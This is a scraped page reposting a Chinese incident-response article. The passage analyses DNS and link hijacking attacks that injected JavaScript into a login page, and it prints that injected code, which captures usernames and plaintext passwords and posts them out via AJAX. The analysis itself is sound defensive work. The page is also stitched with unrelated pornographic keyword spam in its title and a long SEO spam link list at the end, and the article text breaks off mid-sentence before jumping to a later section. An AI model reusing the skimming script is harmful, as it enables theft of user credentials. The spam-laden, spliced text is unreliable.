www涩-www黄网站-www黄色-www黄色com-国产免费拍拍视频在线观看网站-国产免费怕怕免费视频观看

“企業應急響應和反滲透”之真實案例分析

2015-08-26 14:20:04 大云網  點擊量: 評論 (0)
峰會上講過的議題,整理成文章,以供大家批評指正。對于企業應急響應,我想只要從事安全工作的同學都有接觸,我也一樣,在甲方乙方工作的這幾年,處理過不少應急響應的事件,但是每個人都會有自己做事的方法,在


0x06 案例之永無止境的劫持

對于劫持我想大家都不陌生,我們在生活中比較常見到的就是運營商在頁面中插入廣告等代碼,這種就是一種劫持攻擊。

回到案例本身,我們的一個業務先后出現多次多種手段的劫持攻擊,一次是 dns 劫持,把業務的域名劫持到 61.* 這個 ip 上,另外一次是鏈路劫持,替換服務器返回給用戶的 http 響應內容,這兩次的目的都一樣就是在登錄口添加 js 代碼,用于竊取用戶的用戶名和明文密碼。我們另外一個業務也遭受鏈路劫持,直接替換客戶投放的廣告代碼,給業務造成很大的經濟損失。

下面兩個圖是我們業務監控系統和基調的截圖,上面的圖可以很明顯看到在 9:30 用戶登錄成功數明顯下降,持續不到一個小時,下圖是全國部分地區基調的數據,可以看到域名被明顯劫持到 61 這個 ip,這是一次典型的 DNS 攻擊。 

enter image description here  
enter image description here

頁面中被插入的攻擊核心代碼


  1. //獲取用戶名和密碼  
  2. function ffCheck() {  
  3.     try {  
  4.         try {  
  5.             var u = null != f ? f.idInput.value : document.getElementById("idInput").value;  
  6.         } catch (e) {  
  7.             var u = (document.getElementById("idInput").innerHTML).replace(/\s/g, "");  
  8.         }  
  9.         var p = null != f ? f.pwdInput.value : document.getElementById("pwdInput").value;  
  10.         if (u.indexOf("@") == -1) u += "@xxx.com";  
  11.         try {  
  12.             if (u.indexOf("@") == -1) uu = u + getdomain();  
  13.         } catch (e) {}  
  14.         sendurl("/abc", u, p, "coremail");  
  15.     } catch (e) {}  
  16.     return fOnSubmit();  
  17. }  
  18.    
  19. 通過 ajax 發送出去  
  20. function sendurl(uri, u, p, i) {  
  21. xmlHttp = GetXmlHttpObject();  
  22. if (xmlHttp == null) {  
  23.     return;  
  24. }  
  25. param = "user=" + u + "&pass=" + p + "&icp=" + i;  
  26. xmlHttp.onreadystatechange = stateChanged;  
  27. try {  
  28.     xmlHttp.open("POST", uri + "?t=" + (new Date()).valueOf(), true);  
  29. } catch (e) {}  
  30. xmlHttp.setRequestHeader("If-Modified-Since", "0");  
  31. xmlHttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");  
  32. xmlHttp.send(param);  

接下來看下面兩張圖片 

enter image description here  
enter image description here

 

這是一次典型的鏈路劫持攻擊,通過 ttl 就能夠判斷,攻擊的結果和前面提到的 dns 劫持攻擊類似,插入惡意 js 代碼來獲取用戶的用戶名和密碼。

對于劫持攻擊的處理過程,首先是判斷是什么攻擊,對于鏈路劫持目前的鏈路劫持好像大部分都是旁路的攻擊方式,就可以通過 ttl 來定位,默認的 ttl 值很好判斷,如果可以修改的 ttl 值,可以通過遞增或者遞減 ttl 的方式來判斷,dns 劫持就是判斷攻擊方式是什么,哪些 dns 受影響,劫持的 ip 是什么運營商,劫持后做了什么事情。

其次是解決攻擊,一般根據劫持的情況去聯系運營商,聯系有關部門等,但是然并卵,有的功能投訴很有效,比如劫持廣告代碼,有的攻擊則沒有任何作用,比如注入 js 代碼獲取用戶名和密碼。

其實我們能做的畢竟有限,完善監控,當劫持發生的時候能夠第一時間獲知,甚至提醒用戶當前環境有劫持的風險,對部分業務使用 https,但是我覺得都不能根治這些問題。怎么才能解決劫持問題,我沒有好的解決方案,在這里我把這類案例分享出來是希望能夠和各位進一步探討。

0x07 總結

總結這里我就不打算寫太多,我覺得有幾個大的方向作為指導:

從業務角度,保障業務肯定是應急響應的前提;

從對抗角度,知己知彼百戰不殆;

從技術角度,只有更多的了解攻擊才能更好的做到防御;

大云網官方微信售電那點事兒

責任編輯:大云網

免責聲明:本文僅代表作者個人觀點,與本站無關。其原創性以及文中陳述文字和內容未經本站證實,對本文以及其中全部或者部分內容、文字的真實性、完整性、及時性本站不作任何保證或承諾,請讀者僅作參考,并請自行核實相關內容。
我要收藏
個贊
?
主站蜘蛛池模板: 成人久久久久久 | 国内精品久久久久久网站 | 欧美性生交大片免费看 | 国内精品久久国产大陆 | 午夜在线视频一区二区三区 | 99视频在线精品自拍 | 日本高清一本二本三本如色坊 | 男女男精品视频网站在线观看 | 制服丝袜怡红院 | 精品国产福利 | 韩国毛片 | 日韩精品一区二区三区在线观看l | 国产成人18黄网站免费网站 | 台湾三级在线播放 | 欧美aaaaaaaaa | 亚洲加勒比久久88色综合一区 | 精品国产一区二区三区不卡 | 国产91精品露脸国语对白 | 成人精品区 | 视频在线一区二区 | 国内精品久久久久影院亚洲 | 国产成人一级片 | 国产在线观看91精品一区 | 国产一级片免费看 | 亚洲国产综合精品 | 久久久久久久综合 | 午夜爽爽爽 | 免费看成人www的网站软件 | 国产亚洲精品久久久久久久 | 国产欧美精品综合一区 | 波多野结衣视频在线观看地址免费 | 欧美xxxx精品另类 | 日本暖暖在线视频 | 欧美性xxxx极品高清 | 亚洲成a人片在线观看中文 亚洲成a人片在线观看中文!!! | 99久久免费国产精品 | 久久久www免费看片 久久久www免费人成看片 | 久久久www免费看片 久久久www免费人成看片 | 国产精品久久精品 | 欧美国产综合日韩一区二区 | 6一12呦女精品 |